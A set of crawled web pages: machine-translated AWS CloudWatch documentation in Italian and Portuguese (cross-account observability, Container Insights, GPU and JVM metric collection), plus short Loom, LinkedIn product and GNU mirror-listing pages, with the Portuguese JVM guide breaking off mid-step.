monitoraggio abilita il selettore per tutti gli account e tutte le Regioni nella console specificando l'ID dell'account di origine. In questo modo, l'account di monitoraggio è in grado di passare all'account di origine. Quando si cambia, la CloudWatch console verifica l'esistenza di un ruolo collegato al servizio che consente di CloudWatch assumere quello CrossAccountSharingRole che è stato creato nell'account di origine. La centralizzazione dei dati di Amazon CloudWatch Logs consente di AWS Organizations copiare i dati di log da più account membri in un unico repository di dati utilizzando regole di centralizzazione tra account e regioni. Sei tu a definire le regole che replicano automaticamente i dati di log da più account in un account centralizzato all' Regioni AWS interno della tua organizzazione. Quale telemetria è supportata? Parametri Tracce Log Parametri Tracce Log Quali funzionalità sono supportate? Creazione di pannelli di controllo Allarmi Approfondimenti sulle metriche Rilevamento di anomalie CloudWatch Registra informazioni dettagliate Approfondimenti sulle applicazioni Altre funzionalità. Per ulteriori dettagli, consulta CloudWatch osservabilità tra più account . Passaggio da una console all'altra tra account e Regioni differenti nelle console metriche, allarmi e tracce. Pannelli di controllo personalizzati con metriche e allarmi di altri account e Regioni Per ulteriori dettagli, consultare Console per più account e più regioni CloudWatch . CloudWatch Approfondimenti sui log Filtri di sottoscrizione Filtri di parametri Con quanti account posso utilizzare questa funzionalità? Un account di monitoraggio può visualizzare contemporaneamente le risorse di un massimo di 100.000 account di origine. Ogni account di origine può condividere le proprie risorse con un massimo di cinque account di monitoraggio. Utilizzando il selettore per tutti gli account e tutte le Regioni presente nella console, un account di monitoraggio può passare a un singolo altro account alla volta, ma il numero di account collegabili non prevede un limite. Quando si definiscono pannelli di controllo e allarmi tra account, è possibile fare riferimento a molti account di origine. Funziona con il numero di account AWS Organizations supportato I dati di telemetria vengono spostati? No. Le risorse vengono solamente condivise con gli altri account, ad eccezione delle tracce copiate. No. Una policy IAM è configurata per consentire il cambio di account incorporato per la visibilità delle risorse per tutti gli account e tutte le Regioni. Sì Quanto costa? Non comporta costi aggiuntivi per log e metriche condivisi. Inoltre, la prima copia della traccia è gratuita. Per ulteriori informazioni sui prezzi, consulta la pagina CloudWatchdei prezzi di Amazon . Nessun costo aggiuntivo per le operazioni su tutti gli account o tutte le Regioni. Una copia dei log può essere centralizzata gratuitamente. Per le copie aggiuntive viene addebitato un costo di 0,05 USD per GB di log centralizzati (la funzionalità della Regione di backup è considerata una copia aggiuntiva). Per informazioni sui prezzi dei costi di archiviazione nell'account di destinazione e altre esperienze a valore aggiunto, consulta la pagina dei prezzi di Amazon CloudWatch . Supporta l'osservabilità su tutte le Regioni? No Sì Sì, è possibile centralizzare i dati su tutte le Regioni. Supporta l'accesso programmatico? Sì. I AWS CLI AWS Cloud Development Kit (AWS CDK), e APIs sono supportati. No Sì Supporta la configurazione programmatica? Sì Sì Sì Supporta AWS Organizations? Sì Sì Sì. AWS Organizations è necessario per utilizzare questa funzionalità. Argomenti CloudWatch osservabilità tra più account Console per più account e più regioni CloudWatch JavaScript è disabilitato o non è disponibile nel tuo browser. Per usare la documentazione AWS, JavaScript deve essere abilitato. Consulta le pagine della guida del browser per le istruzioni. Convenzioni dei documenti Risoluzione dei problemi CloudWatch osservabilità tra più account Questa pagina ti è stata utile? - Sì Grazie per averci comunicato che stiamo facendo un buon lavoro! Se hai un momento, ti invitiamo a dirci che cosa abbiamo fatto che ti è piaciuto così possiamo offrirti altri contenuti simili. Questa pagina ti è stata utile? - No Grazie per averci comunicato che questa pagina ha bisogno di essere modificata. Siamo spiacenti di non aver soddisfatto le tue esigenze. Se hai un momento, ti invitiamo a dirci come possiamo migliorare la documentazione. | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/it_it/AmazonCloudWatch/latest/monitoring/ContainerInsights.html | Container Insights - Amazon CloudWatch Container Insights - Amazon CloudWatch Documentazione Amazon CloudWatch Guida per l’utente Piattaforme supportate CloudWatch immagine del contenitore dell'agente Le traduzioni sono generate tramite traduzione automatica. In caso di conflitto tra il contenuto di una traduzione e la versione originale in Inglese, quest'ultima prevarrà. Container Insights Utilizza CloudWatch Container Insights per raccogliere, aggregare e riepilogare metriche e log delle applicazioni e dei microservizi containerizzati. Container Insights è disponibile per Amazon Elastic Container Service (Amazon ECS), Amazon Elastic Kubernetes Service (Amazon RedHat OpenShift EKS), on (ROSA AWS ) e Kubernetes su Amazon. EC2 Container Insights supporta la raccolta di metriche dai cluster distribuiti AWS Fargate sia per Amazon ECS che per Amazon EKS. CloudWatch raccoglie automaticamente i parametri per molte risorse, come CPU, memoria, disco e rete. Container Insights fornisce inoltre informazioni diagnostiche, ad esempio errori di riavvio del container, che consentono di isolare i problemi e risolverli in modo rapido. Puoi anche impostare CloudWatch allarmi sulle metriche raccolte da Container Insights. Container Insights raccoglie dati come eventi di log delle prestazioni tramite Embedded Metric Format . Questi eventi di log delle prestazioni sono elementi che usano uno schema JSON strutturato che consente ai dati ad alta cardinalità di essere acquisiti e archiviati su larga scala. Da questi dati, CloudWatch crea metriche aggregate a livello di cluster, nodo, pod, task e servizio come metriche. CloudWatch Le metriche raccolte da Container Insights sono disponibili nei dashboard CloudWatch automatici e sono visualizzabili anche nella sezione Metriche della console. CloudWatch I parametri non sono visibili fino a quando le attività del container non sono in esecuzione da qualche tempo. Quando si implementa Approfondimenti sui container, viene creato automaticamente un gruppo di log per gli eventi del log delle prestazioni. Non è necessario creare questo gruppo di log da soli. Per aiutarti a gestire i costi di Container Insights, CloudWatch non crea automaticamente tutte le metriche possibili dai dati di registro. Tuttavia, puoi visualizzare metriche aggiuntive e livelli di granularità aggiuntivi utilizzando CloudWatch Logs Insights per analizzare gli eventi non elaborati del registro delle prestazioni. Con la versione originale di Approfondimenti sui container, i parametri raccolti e i log importati vengono addebitati come parametri personalizzati. Con Approfondimenti sui container con osservabilità migliorata per Amazon EKS, i parametri e i log di Approfondimenti sui container vengono addebitati per osservazione anziché per parametro archiviato o log importato. Per ulteriori informazioni sui CloudWatch prezzi, consulta la pagina CloudWatch dei prezzi di Amazon . In Amazon EKS AWS, RedHatOpenshift on e Kubernetes, Container Insights utilizza una versione containerizzata dell' CloudWatch agente per scoprire tutti i container in esecuzione in un cluster. Quindi raccoglie i dati sulle prestazioni a ogni livello dello stack delle prestazioni. Container Insights supporta la crittografia AWS KMS key per i log e le metriche che raccoglie. Per abilitare questa crittografia, è necessario abilitare manualmente la AWS KMS crittografia per il gruppo di log che riceve i dati di Container Insights. In questo modo, Approfondimenti sui container crittografa questi dati utilizzando la chiave KMS fornita. Sono supportate solo le chiavi simmetriche. Non utilizzare chiavi KMS asimmetriche per crittografare i gruppi di log. Per ulteriori informazioni, consulta Encrypt Log Data in CloudWatch Logs Using. AWS KMS Piattaforme supportate Container Insights è disponibile per le piattaforme Amazon Elastic Container Service, Amazon Elastic Kubernetes Service RedHat OpenShift e Kubernetes AWS su istanze Amazon. EC2 Per Amazon ECS, Approfondimenti sui container raccoglie i parametri a livello di cluster, attività e servizio nelle istanze Linux e Windows Server. Container Insights raccoglie metriche a livello di istanza solo sulle istanze Linux. Le metriche di rete sono disponibili per i container che utilizzano la modalità di rete bridge e quella awsvpc , ma non sono disponibili per i container che utilizzano la modalità di rete host . Per Amazon Elastic Kubernetes Service e le piattaforme Kubernetes su istanze EC2 Amazon, Container Insights è supportato su istanze Linux e Windows. CloudWatch immagine del contenitore dell'agente Amazon fornisce un'immagine del contenitore dell' CloudWatch agente su Amazon Elastic Container Registry. Per maggiori informazioni, consulta cloudwatch-agent su Amazon ECR. JavaScript è disabilitato o non è disponibile nel tuo browser. Per usare la documentazione AWS, JavaScript deve essere abilitato. Consulta le pagine della guida del browser per le istruzioni. Convenzioni dei documenti Monitoraggio dell'infrastruttura Approfondimenti sui container con osservabilità avanzata per Amazon ECS Questa pagina ti è stata utile? - Sì Grazie per averci comunicato che stiamo facendo un buon lavoro! Se hai un momento, ti invitiamo a dirci che cosa abbiamo fatto che ti è piaciuto così possiamo offrirti altri contenuti simili. Questa pagina ti è stata utile? - No Grazie per averci comunicato che questa pagina ha bisogno di essere modificata. Siamo spiacenti di non aver soddisfatto le tue esigenze. Se hai un momento, ti invitiamo a dirci come possiamo migliorare la documentazione. | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/it_it/AmazonCloudWatch/latest/monitoring/CloudWatch-Agent-NVIDIA-GPU.html | Raccolta dei parametri della GPU NVIDIA - Amazon CloudWatch Raccolta dei parametri della GPU NVIDIA - Amazon CloudWatch Documentazione Amazon CloudWatch Guida per l’utente Le traduzioni sono generate tramite traduzione automatica. In caso di conflitto tra il contenuto di una traduzione e la versione originale in Inglese, quest'ultima prevarrà. Raccolta dei parametri della GPU NVIDIA Puoi utilizzare l' CloudWatch agente per raccogliere i parametri della GPU NVIDIA dai server Linux. Per configurarlo, aggiungi una nvidia_gpu sezione all'interno della metrics_collected sezione del file di configurazione dell' CloudWatch agente. Per ulteriori informazioni, consulta Sezione Linux . Inoltre, sull'istanza deve essere installato un driver NVIDIA. I driver NVIDIA sono preinstallati su alcune Amazon Machine Images ()AMIs. In caso contrario, il driver può essere installato manualmente. Per ulteriori informazioni, consulta Installazione dei driver NVIDIA sulle istanze Linux . È possibile raccogliere i seguenti parametri. Tutte queste metriche vengono raccolte senza CloudWatch Unit , ma è possibile specificare un'unità per ogni metrica aggiungendo un parametro al file di configurazione dell' CloudWatch agente. Per ulteriori informazioni, consulta Sezione Linux . Metrica Nome della metrica in CloudWatch Description utilization_gpu nvidia_smi_utilization_gpu La percentuale di tempo nell'ultimo periodo di campionamento in cui erano in esecuzione uno o più kernel sulla GPU. temperature_gpu nvidia_smi_temperature_gpu La temperatura del core della GPU in gradi Celsius. power_draw nvidia_smi_power_draw L'ultimo assorbimento di potenza misurato per l'intera scheda, in watt. utilization_memory nvidia_smi_utilization_memory La percentuale di tempo nell'ultimo periodo di campionamento in cui la memoria globale (dispositivo) veniva letta o scritta. fan_speed nvidia_smi_fan_speed La percentuale di velocità massima attualmente prevista per il funzionamento della ventola del dispositivo. memory_total nvidia_smi_memory_total Memoria totale riportata, in MB. memory_used nvidia_smi_memory_used Memoria utilizzata, in MB. memory_free nvidia_smi_memory_free Memoria libera, in MB. pcie_link_gen_current nvidia_smi_pcie_link_gen_current L'attuale generazione del collegamento. pcie_link_width_current nvidia_smi_pcie_link_width_current L'attuale larghezza del collegamento. encoder_stats_session_count nvidia_smi_encoder_stats_session_count Il numero attuale di sessioni dell'encoder. encoder_stats_average_fps nvidia_smi_encoder_stats_average_fps La media mobile dei fotogrammi di codifica al secondo. encoder_stats_average_latency nvidia_smi_encoder_stats_average_latency La media mobile della latenza di codifica in microsecondi. clocks_current_graphics nvidia_smi_clocks_current_graphics L'attuale frequenza di clock della scheda video (shader). clocks_current_sm nvidia_smi_clocks_current_sm L'attuale frequenza di clock dello Streaming Multiprocessor (SM). clocks_current_memory nvidia_smi_clocks_current_memory L'attuale frequenza di clock della memoria. clocks_current_video nvidia_smi_clocks_current_video L'attuale frequenza di clock del video (encoder più decoder). Tutti questi parametri vengono raccolti con le seguenti dimensioni: Dimensione Description index Un identificatore univoco per la GPU su questo server. Rappresenta l'indice NVIDIA Management Library (NVML) del dispositivo. name Il tipo di GPU. Ad esempio, NVIDIA Tesla A100 arch L'architettura del server. JavaScript è disabilitato o non è disponibile nel tuo browser. Per usare la documentazione AWS, JavaScript deve essere abilitato. Consulta le pagine della guida del browser per le istruzioni. Convenzioni dei documenti Raccogli i EC2 parametri dell'instance store Raccolta delle metriche di Java Management Extensions (JMX) Questa pagina ti è stata utile? - Sì Grazie per averci comunicato che stiamo facendo un buon lavoro! Se hai un momento, ti invitiamo a dirci che cosa abbiamo fatto che ti è piaciuto così possiamo offrirti altri contenuti simili. Questa pagina ti è stata utile? - No Grazie per averci comunicato che questa pagina ha bisogno di essere modificata. Siamo spiacenti di non aver soddisfatto le tue esigenze. Se hai un momento, ti invitiamo a dirci come possiamo migliorare la documentazione. | 2026-01-13T09:29:26 |
https://www.loom.com/community#skip-to-content | Community: See how Loom can save you time at work from Loom employees and customers like you. | Loom Skip to content Toggle menu close Community See how Loom can save you time at work from Loom employees and customers like you. Watch tips and tricks that help you level up your use of Loom, or submit your own. | 2026-01-13T09:29:26 |
https://www.linkedin.com/products/heydovetail-dovetail/?trk=products_seo_search | Dovetail | LinkedIn Skip to main content LinkedIn Dovetail in Asan Expand search This button displays the currently selected search type. When expanded it provides a list of search options that will switch the search inputs to match the current selection. Jobs People Learning Clear text Clear text Clear text Clear text Clear text Join now Sign in Dovetail Product Management Software by Dovetail See who's skilled in this Add as skill Learn more Report this product About Dovetail is the world’s leading AI-first customer insights hub, giving thousands of teams the answers they need to build the next big thing. By centralizing user feedback and providing smart features that uncover valuable insights faster, Dovetail helps you identify problems faster, prioritize roadmaps more confidently, and supercharge your strategy to make better product decisions. From user interviews to sales calls to support tickets and beyond, transform messy customer data into insights that scale. This product is intended for Design Director Researcher Director Customer Experience Product Manager Director of Product Management Director of Product Development Director Research Operations Media Products media viewer No more previous content Spring Launch 2025 From sales calls to support tickets, interviews to docs, Dovetail's AI brings every piece of customer intelligence into one place, enabling teams to act on feedback faster. Contextual chat: have a conversation with your data, get the insights you need A powerful and intuitive new way to interact with your customer data. Chat allows you to interact with any type of data in Dovetail conversationally. Need to understand why a recent sales call didn’t convert? Want to identify recurring pain points mentioned in support tickets? Simply ask. Chat empowers you to query your data—across transcripts, notes, projects, folders, channels and more—in real time as if you were having a conversation with your data itself. Magic insights: automated insight reports Magic insights enables your team to automatically generate structured, actionable insight reports from your project (and Channels) data. Whether it’s synthesizing customer interview transcripts, analyzing open-ended survey responses, or identifying key themes in support tickets, magic insights does the heavy lifting, presenting you with clear, ready-to-share insights reports. Magic summaries: get takeaways tailored to your needs We’ve made magic summaries more powerful and customizable to your specific needs. What was once a chronological summary of your call or document, magic summaries now lets you customize your output to fit your team’s needs. Select from frameworks like usability test, customer call, sales (SPICED), get a high-level summary and actions, or a breakdown by topic, and more, to align perfectly with the needs of different teams or projects, from informing sales strategies to guiding product development. Translation (beta): seamless global collaboration Translation makes it possible for global teams to collaborate, share insights, and make better decisions across different geos and regions. Dovetail now automatically translates transcripts and magic summaries across 75 languages. Whether you have remote sales teams in different countries or are conducting research with participants globally, language doesn’t need to be a barrier to understanding your customers. No more next content Featured customers of Dovetail Universal Music Group Entertainment Providers 1,045,202 followers Deloitte Business Consulting and Services 20,765,859 followers Notion Software Development 939,742 followers Mayo Clinic Hospitals and Health Care 1,579,167 followers GitLab IT Services and IT Consulting 1,099,653 followers Amazon Software Development 36,032,701 followers Volkswagen Group Motor Vehicle Manufacturing 1,720,089 followers Eucalyptus Health and Human Services 49,056 followers The New York Times Newspaper Publishing 6,880,575 followers Breville | Sage Manufacturing 27,445 followers Harvard Business Publishing Technology, Information and Internet 164,524 followers Atlassian Software Development 2,340,591 followers Johns Hopkins Medicine Hospitals and Health Care 489,859 followers Canva Software Development 2,418,785 followers SafetyCulture Software Development 53,796 followers Kickstarter Software Development 103,544 followers Zapier Software Development 336,883 followers Sonder Software Development 33,118 followers Starbucks Retail 3,091,714 followers Okta Software Development 584,498 followers Cloudflare Computer and Network Security 1,123,490 followers Show more Show less Similar products Productboard Productboard Product Management Software Aha! Academy Aha! Academy Product Management Software Product Portfolio Management Product Portfolio Management Product Management Software Producer Producer Product Management Software Interim Product Managers Interim Product Managers Product Management Software Aha! Discovery Aha! Discovery Product Management Software Sign in to see more Show more Show less LinkedIn © 2026 About Accessibility User Agreement Privacy Policy Cookie Policy Copyright Policy Brand Policy Guest Controls Community Guidelines English (English) Language | 2026-01-13T09:29:26 |
http://mirror.freedif.org/GNU/GNUinfo/Audio/ | Index of ftp.gnu.org/gnu/GNUinfo/Audio The FSF provides this archive as a service to GNU users. Please consider donating to the FSF at http://donate.fsf.org/ . Index of ftp.gnu.org/gnu/GNUinfo/Audio Up to higher level directory .. README 1 KB 2002-04-13 01:37:41 PM francais/ 5 KB 2003-03-22 05:52:51 PM index.txt 1 KB 2002-04-13 01:59:50 PM rms-speech-arsdigita2001.ogg 22523 KB 2002-02-28 07:49:20 AM rms-speech-cambridgeuni-england2002.ogg 12840 KB 2002-04-01 10:45:52 PM rms-speech-cglug2000.ogg 21605 KB 2002-02-28 07:51:32 AM rms-speech-linuxtag2000.ogg 18790 KB 2002-02-26 08:14:14 AM rms-speech-mit2001.ogg 15304 KB 2002-02-28 07:55:25 AM rms-speech-nyu2001.ogg 19177 KB 2002-02-28 07:57:50 AM rms-speech-qmul-london2002.ogg 16820 KB 2002-02-26 08:11:03 AM | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/pt_br/AmazonCloudWatch/latest/monitoring/Solution-JVM-On-EC2.html#Solution-JVM-Agent-Step2 | Solução do CloudWatch: workload da JVM no Amazon EC2 - Amazon CloudWatch Solução do CloudWatch: workload da JVM no Amazon EC2 - Amazon CloudWatch Documentação Amazon CloudWatch Guia do usuário Requisitos Benefícios Custos Configuração do agente do CloudWatch para esta solução Implantação do agente para a sua solução Criação de um painel para a solução da JVM Solução do CloudWatch: workload da JVM no Amazon EC2 Esta solução auxilia na configuração da coleta de métricas prontas para uso com agentes do CloudWatch para aplicações da JVM que estão sendo executadas em instâncias do EC2. Além disso, a solução ajuda na configuração de um painel do CloudWatch configurado previamente. Para obter informações gerais sobre todas as soluções de observabilidade do CloudWatch, consulte Soluções de observabilidade do CloudWatch . Tópicos Requisitos Benefícios Custos Configuração do agente do CloudWatch para esta solução Implantação do agente para a sua solução Criação de um painel para a solução da JVM Requisitos Esta solução é aplicável nas seguintes condições: Versões compatíveis: versões LTS do Java 8, 11, 17 e 21 Computação: Amazon EC2 Fornecimento de suporte para até 500 instâncias do EC2 em todas as workloads da JVM em uma Região da AWS específica Versão mais recente do agente do CloudWatch SSM Agent instalado na instância do EC2 nota O AWS Systems Manager (SSM Agent) está instalado previamente em algumas imagens de máquinas da Amazon (AMIs) fornecidas pela AWS e por entidades externas confiáveis. Se o agente não estiver instalado, você poderá instalá-lo manualmente usando o procedimento adequado para o seu tipo de sistema operacional. Instalar e desinstalar o SSM Agent manualmente em instâncias do EC2 para Linux Instalar e desinstalar o SSM Agent manualmente em instâncias do EC2 para macOS Instalar e desinstalar o SSM Agent manualmente em instâncias do EC2 para Windows Server Benefícios A solução disponibiliza monitoramento da JVM, fornecendo insights valiosos para os seguintes casos de uso: Monitoramento do uso de memória do heap e de memória não relacionada ao heap da JVM. Análise de threads e de carregamento de classes para identificar problemas de simultaneidade. Rastreamento da coleta de resíduos para identificar possíveis vazamentos de memória. Alternância entre diferentes aplicações da JVM configuradas pela solução na mesma conta. A seguir, apresentamos as principais vantagens da solução: Automatiza a coleta de métricas para a JVM usando a configuração do agente do CloudWatch, o que elimina a necessidade de instrumentação manual. Fornece um painel do CloudWatch consolidado e configurado previamente para as métricas da JVM. O painel gerenciará automaticamente as métricas das novas instâncias do EC2 para a JVM que foram configuradas usando a solução, mesmo que essas métricas não estejam disponíveis no momento de criação do painel. Além disso, o painel permite agrupar as métricas em aplicações lógicas para facilitar o foco e o gerenciamento. A imagem apresentada a seguir é um exemplo do painel para esta solução. Custos Esta solução cria e usa recursos em sua conta. A cobrança será realizada com base no uso padrão, que inclui o seguinte: Todas as métricas coletadas pelo agente do CloudWatch são cobradas como métricas personalizadas. O número de métricas usadas por esta solução depende do número de hosts do EC2. Cada host da JVM configurado para a solução publica um total de 18 métricas, além de uma métrica ( disk_used_percent ) cuja contagem de métricas depende do número de caminhos fornecidos para o host. Um painel personalizado. As operações da API solicitadas pelo agente do CloudWatch para publicar as métricas. Com a configuração padrão para esta solução, o agente do CloudWatch chama a operação PutMetricData uma vez por minuto para cada host do EC2. Isso significa que a API PutMetricData será chamada 30*24*60=43,200 em um mês com 30 dias para cada host do EC2. Para obter mais informações sobre os preços do CloudWatch, consulte Preço do Amazon CloudWatch . A calculadora de preços pode ajudar a estimar os custos mensais aproximados para o uso desta solução. Como usar a calculadora de preços para estimar os custos mensais da solução Abra a calculadora de preços do Amazon CloudWatch . Em Escolher uma região , selecione a região em que você gostaria de implantar a solução. Na seção Métricas , em Número de métricas , insira (18 + average number of disk paths per EC2 host) * number of EC2 instances configured for this solution . Na seção APIs , em Número de solicitações de API , insira 43200 * number of EC2 instances configured for this solution . Por padrão, o agente do CloudWatch executa uma operação PutMetricData a cada minuto para cada host do EC2. Na seção Painéis e alarmes , em Número de painéis , insira 1 . É possível visualizar os custos mensais estimados na parte inferior da calculadora de preços. Configuração do agente do CloudWatch para esta solução O agente do CloudWatch é um software que opera de maneira contínua e autônoma em seus servidores e em ambientes com contêineres. Ele coleta métricas, logs e rastreamentos da infraestrutura e das aplicações e os envia para o CloudWatch e para o X-Ray. Para obter mais informações sobre o agente do CloudWatch, consulte Coleta de métricas, logs e rastreamentos usando o agente do CloudWatch . A configuração do agente nesta solução coleta as métricas fundamentais para a solução. O agente do CloudWatch pode ser configurado para coletar mais métricas da JVM do que as que são exibidas por padrão no painel. Para obter uma lista de todas as métricas da JVM que você pode coletar, consulte Coletar métricas da JVM . Para obter informações gerais sobre a configuração do agente do CloudWatch, consulte Métricas coletadas pelo atendente do CloudWatch . Exposição de portas do JMX para a aplicação da JVM O agente do CloudWatch depende do JMX para coletar as métricas relacionadas ao processo da JVM. Para que isso aconteça, é necessário expor a porta do JMX da aplicação da JVM. As instruções para expor a porta do JMX dependem do tipo de workload que você está usando para a aplicação da JVM. Consulte a documentação específica para a aplicação para encontrar essas instruções. De maneira geral, para habilitar uma porta do JMX para monitoramento e gerenciamento, você precisa configurar as propriedades do sistema apresentadas a seguir para a aplicação da JVM. Certifique-se de especificar um número de porta que não esteja em uso. O exemplo apresentado a seguir configura o JMX sem autenticação. Se suas políticas ou seus requisitos de segurança exigirem que você habilite o JMX com autenticação por senha ou SSL para a obtenção de acesso remoto, consulte a documentação do JMX para definir a propriedade necessária. -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port= port-number -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false Analise os scripts de inicialização e os arquivos de configuração da aplicação para encontrar o local mais adequado para adicionar esses argumentos. Quando você executar um arquivo .jar usando a linha de comando, o comando pode ser semelhante ao apresentado a seguir, em que pet-search.jar é o nome do arquivo JAR da aplicação. $ java -jar -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=9999 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false pet-search.jar Configuração do agente para esta solução As métricas coletadas pelo agente são definidas na configuração do agente. A solução fornece configurações do agente para a coleta das métricas recomendadas com dimensões adequadas para o painel da solução. As etapas para a implantação da solução são descritas posteriormente em Implantação do agente para a sua solução . As informações apresentadas a seguir são destinadas a ajudar você a compreender como personalizar a configuração do agente para o seu ambiente. Você deve personalizar algumas partes da seguinte configuração do agente para o seu ambiente: O número da porta do JMX corresponde ao número da porta que você configurou na seção anterior desta documentação. Esse número está na linha endpoint na configuração. ProcessGroupName : forneça nomes significativos para a dimensão ProcessGroupName . Esses nomes devem representar o agrupamento de clusters, de aplicações ou de serviços para as instâncias do EC2 que executam aplicações ou processos semelhantes. Isso auxilia no agrupamento de métricas de instâncias que pertencem ao mesmo grupo de processos da JVM, proporcionando uma visão unificada da performance do cluster, da aplicação e do serviço no painel da solução. Por exemplo, caso você tenha duas aplicações em Java em execução na mesma conta, sendo uma para a aplicação order-processing e a outra para a aplicação inventory-management , é necessário configurar as dimensões ProcessGroupName de maneira adequada na configuração do agente de cada instância. Para as instâncias da aplicação order-processing , defina ProcessGroupName=order-processing . Para as instâncias da aplicação inventory-management , defina ProcessGroupName=inventory-management . Ao seguir essas diretrizes, o painel da solução agrupará automaticamente as métricas com base na dimensão ProcessGroupName . O painel incluirá opções do menu suspenso para a seleção e para a visualização de métricas de um grupo de processos específico, permitindo o monitoramento da performance de grupos de processos individuais separadamente. Configuração do agente para hosts da JVM Use a configuração do agente do CloudWatch apresentada a seguir nas instâncias do EC2 em que as aplicações em Java estão implantadas. A configuração será armazenada como um parâmetro no Parameter Store do SSM, conforme detalhado posteriormente em Etapa 2: armazenar o arquivo de configuração recomendado do agente do CloudWatch no Systems Manager Parameter Store . Substitua ProcessGroupName pelo nome do grupo de processos. Substitua port-number pelo número da porta do JMX da aplicação em Java. Se o JMX tiver sido habilitado com autenticação por senha ou SSL para acesso remoto, consulte Coletar métricas do Java Management Extensions (JMX) para obter informações sobre como configurar o TLS ou a autorização na configuração do agente, conforme necessário. As métricas do EC2 mostradas nesta configuração (configuração apresentada de forma externa ao bloco do JMX) funcionam somente para instâncias do Linux e do macOS. Caso esteja usando instâncias do Windows, é possível optar por omitir essas métricas na configuração. Para obter mais informações sobre as métricas coletadas em instâncias do Windows, consulte Métricas coletadas pelo atendente do CloudWatch em instâncias do Windows Server . { "metrics": { "namespace": "CWAgent", "append_dimensions": { "InstanceId": "$ { aws:InstanceId}" }, "metrics_collected": { "jmx": [ { "endpoint": "localhost: port-number ", "jvm": { "measurement": [ "jvm.classes.loaded", "jvm.gc.collections.count", "jvm.gc.collections.elapsed", "jvm.memory.heap.committed", "jvm.memory.heap.max", "jvm.memory.heap.used", "jvm.memory.nonheap.committed", "jvm.memory.nonheap.max", "jvm.memory.nonheap.used", "jvm.threads.count" ] }, "append_dimensions": { "ProcessGroupName": " ProcessGroupName " } } ], "disk": { "measurement": [ "used_percent" ] }, "mem": { "measurement": [ "used_percent" ] }, "swap": { "measurement": [ "used_percent" ] }, "netstat": { "measurement": [ "tcp_established", "tcp_time_wait" ] } } } } Implantação do agente para a sua solução Existem várias abordagens para instalar o agente do CloudWatch, dependendo do caso de uso. Recomendamos o uso do Systems Manager para esta solução. Ele fornece uma experiência no console e simplifica o gerenciamento de uma frota de servidores gerenciados em uma única conta da AWS. As instruções apresentadas nesta seção usam o Systems Manager e são destinadas para situações em que o agente do CloudWatch não está em execução com as configurações existentes. É possível verificar se o agente do CloudWatch está em execução ao seguir as etapas apresentadas em Verificar se o atendente do CloudWatch está em execução . Se você já estiver executando o agente do CloudWatch nos hosts do EC2 nos quais a workload está implantada e gerenciando as configurações do agente, pode pular as instruções apresentadas nesta seção e usar o mecanismo de implantação existente para atualizar a configuração. Certifique-se de combinar a configuração do agente da JVM com a configuração do agente existente e, em seguida, implante a configuração combinada. Se você estiver usando o Systems Manager para armazenar e gerenciar a configuração do agente do CloudWatch, poderá combinar a configuração com o valor do parâmetro existente. Para obter mais informações, consulte Managing CloudWatch agent configuration files . nota Ao usar o Systems Manager para implantar as configurações do agente do CloudWatch apresentadas a seguir, qualquer configuração existente do agente do CloudWatch nas suas instâncias do EC2 será substituída ou sobrescrita. É possível modificar essa configuração para atender às necessidades do ambiente ou do caso de uso específico. As métricas definidas nesta solução representam o requisito mínimo para o painel recomendado. O processo de implantação inclui as seguintes etapas: Etapa 1: garantir que as instâncias do EC2 de destino têm as permissões do IAM necessárias. Etapa 2: armazenar o arquivo de configuração recomendado do agente no Systems Manager Parameter Store. Etapa 3: instalar o agente do CloudWatch em uma ou mais instâncias do EC2 usando uma pilha do CloudFormation. Etapa 4: verificar se a configuração do agente foi realizada corretamente. Etapa 1: garantir que as instâncias do EC2 de destino têm as permissões do IAM necessárias Você deve conceder permissão para o Systems Manager instalar e configurar o agente do CloudWatch. Além disso, é necessário conceder permissão para que o agente do CloudWatch publique a telemetria da instância do EC2 para o CloudWatch. Certifique-se de que o perfil do IAM anexado à instância tenha as políticas do IAM CloudWatchAgentServerPolicy e AmazonSSMManagedInstanceCore associadas. Após criar o perfil, associe-o às suas instâncias do EC2. Siga as etapas apresentadas em Launch an instance with an IAM role para anexar um perfil durante a inicialização de uma nova instância do EC2. Para anexar um perfil a uma instância do EC2 existente, siga as etapas apresentadas em Attach an IAM role to an instance . Etapa 2: armazenar o arquivo de configuração recomendado do agente do CloudWatch no Systems Manager Parameter Store O Parameter Store simplifica a instalação do agente do CloudWatch em uma instância do EC2 ao armazenar e gerenciar os parâmetros de configuração de forma segura, eliminando a necessidade de valores com codificação rígida. Isso garante um processo de implantação mais seguro e flexível ao possibilitar o gerenciamento centralizado e as atualizações simplificadas para as configurações em diversas instâncias. Use as etapas apresentadas a seguir para armazenar o arquivo de configuração recomendado do agente do CloudWatch como um parâmetro no Parameter Store. Como criar o arquivo de configuração do agente do CloudWatch como um parâmetro Abra o console AWS Systems Manager em https://console.aws.amazon.com/systems-manager/ . No painel de navegação, escolha Gerenciamento de aplicações e, em seguida, Parameter Store . Siga as etapas apresentadas a seguir para criar um novo parâmetro para a configuração. Escolha Criar Parâmetro . Na caixa Nome , insira um nome que será usado para referenciar o arquivo de configuração do agente do CloudWatch nas etapas posteriores. Por exemplo, . AmazonCloudWatch-JVM-Configuration (Opcional) Na caixa Descrição , digite uma descrição para o parâmetro. Em Camadas de parâmetros , escolha Padrão . Para Tipo , escolha String . Em Tipo de dados , selecione texto . Na caixa Valor , cole o bloco em JSON correspondente que foi listado em Configuração do agente para hosts da JVM . Certifique-se de personalizar o valor da dimensão de agrupamento e o número da porta, conforme descrito. Escolha Criar Parâmetro . Etapa 3: instalar o agente do CloudWatch e aplicar a configuração usando um modelo do CloudFormation É possível usar o AWS CloudFormation para instalar o agente e configurá-lo para usar a configuração do agente do CloudWatch criada nas etapas anteriores. Como instalar e configurar o agente do CloudWatch para esta solução Abra o assistente para criar pilha de forma rápida do CloudFormation usando este link: https://console.aws.amazon.com/cloudformation/home?#/stacks/quickcreate?templateURL=https://aws-observability-solutions-prod-us-east-1.s3.us-east-1.amazonaws.com/CloudWatchAgent/CFN/v1.0.0/cw-agent-installation-template-1.0.0.json . Verifique se a região selecionada no console corresponde à região em que a workload da JVM está em execução. Em Nome da pilha , insira um nome para identificar esta pilha, como CWAgentInstallationStack . Na seção Parâmetros , especifique o seguinte: Para 